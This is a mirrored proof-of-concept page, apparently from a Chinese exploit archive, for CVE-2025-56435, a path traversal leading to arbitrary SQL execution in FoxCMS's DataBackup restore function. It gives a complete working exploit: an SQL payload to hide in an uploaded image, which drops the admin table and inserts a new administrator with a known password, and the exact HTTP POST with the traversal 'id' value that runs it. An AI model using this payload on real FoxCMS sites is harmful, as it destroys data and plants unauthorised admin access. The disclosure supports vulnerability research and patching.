关联漏洞
标题:
FoxCMS 安全漏洞
(CVE-2025-56435)
描述:FoxCMS是中国黔狐(FoxCMS)公司的一套可免费商用开源的内容管理系统。 FoxCMS v1.2.6及之前版本存在安全漏洞,该漏洞源于文件/DataBackup.php中参数id的错误操作导致SQL注入。
描述
CVE-2025-56435
介绍
# -CVE-2025-56435
CVE-2025-56435
The restore method under the app\admin\controller\DataBackup.php route obtains the parameter id ($sqlPath = app()->getRootPath(). 'data'. $id;). The id can be directly concatenated to... / Perform directory traversal
The for loop is also used to execute sql on the file in the path. Therefore, any image file with an sql statement can be uploaded and then restored through this method, and any sql statement can be executed
<img width="864" height="367" alt="image" src="https://github.com/user-attachments/assets/0093d223-f625-4dd8-8fed-804c1fec5db9" />
漏洞复现如下:
搭建环境后,任意上传一个图片文件,带sql语句如下(创建新用户):
DROP TABLE IF EXISTS `fox_admin`;
CREATE TABLE `fox_admin` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`nickname` varchar(255) DEFAULT NULL COMMENT '昵称',
`username` varchar(60) NOT NULL DEFAULT '' COMMENT '用户名',
`password` varchar(64) NOT NULL DEFAULT '' COMMENT '登录密码;mb_password加密',
`avatar` varchar(255) DEFAULT '' COMMENT '用户头像,相对于upload/avatar目录',
`email` varchar(100) DEFAULT '' COMMENT '登录邮箱',
`phone` bigint(20) unsigned DEFAULT NULL COMMENT '手机号',
`status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '用户状态 0:禁用; 1:启用',
`register_time` datetime DEFAULT NULL COMMENT '注册时间',
`last_login_ip` varchar(16) DEFAULT '' COMMENT '最后登录ip',
`last_login_time` datetime DEFAULT NULL COMMENT '最后登录时间',
`remark` varchar(100) DEFAULT NULL COMMENT '备注',
`lock_time` datetime DEFAULT NULL COMMENT '账号锁定时间',
PRIMARY KEY (`id`) USING BTREE,
KEY `user_login_key` (`username`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC COMMENT='后台用户表';
INSERT INTO `fox_admin` (
`nickname`,
`username`,
`password`,
`avatar`,
`email`,
`phone`,
`status`,
`register_time`,
`last_login_ip`,
`last_login_time`,
`remark`,
`lock_time`
) VALUES (
'测试管理员',
'test12311',
MD5('123QWQW@@'),
'/uploads/avatar/default.jpg',
'test12311@example.com',
13800138000,
1,
NOW(),
'',
NULL,
'通过SQL添加的测试账户',
NULL
);
<img width="864" height="383" alt="image" src="https://github.com/user-attachments/assets/90eb7dc9-c031-4a8c-96c8-5bdabbfba917" />
<img width="863" height="418" alt="image" src="https://github.com/user-attachments/assets/b62f8bad-3770-4e60-8044-29266ae9042e" />
<img width="863" height="418" alt="image" src="https://github.com/user-attachments/assets/0680bb12-a9d1-4293-b22e-809ecb1fdcee" />
记录文件地址,执行sql语句
<img width="865" height="378" alt="image" src="https://github.com/user-attachments/assets/ecb5f20f-9523-4ed8-8236-2a8743346a2d" />
POST /index.php/admin2362/DataBackup/restore HTTP/1.1
Host: 192.168.187.92:82
Content-Length: 55
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.187.92:82
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=04c9924960eddfff731546b6e79bbe4a; access_192_168_187_92=1752108777
Connection: keep-alive
id=/1/../../uploads/files/20250710/25c300de9e16f965.svg
创建了新用户
http://192.168.187.92:82/index.php/admin2362/admin/index.html?columnId=11
<img width="864" height="371" alt="image" src="https://github.com/user-attachments/assets/b30d0bd9-cbb4-4f91-ac5a-e556694ebbad" />
文件快照
[4.0K] /data/pocs/b5399b017df26af584da71c68c54c1066202c47a
└── [3.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。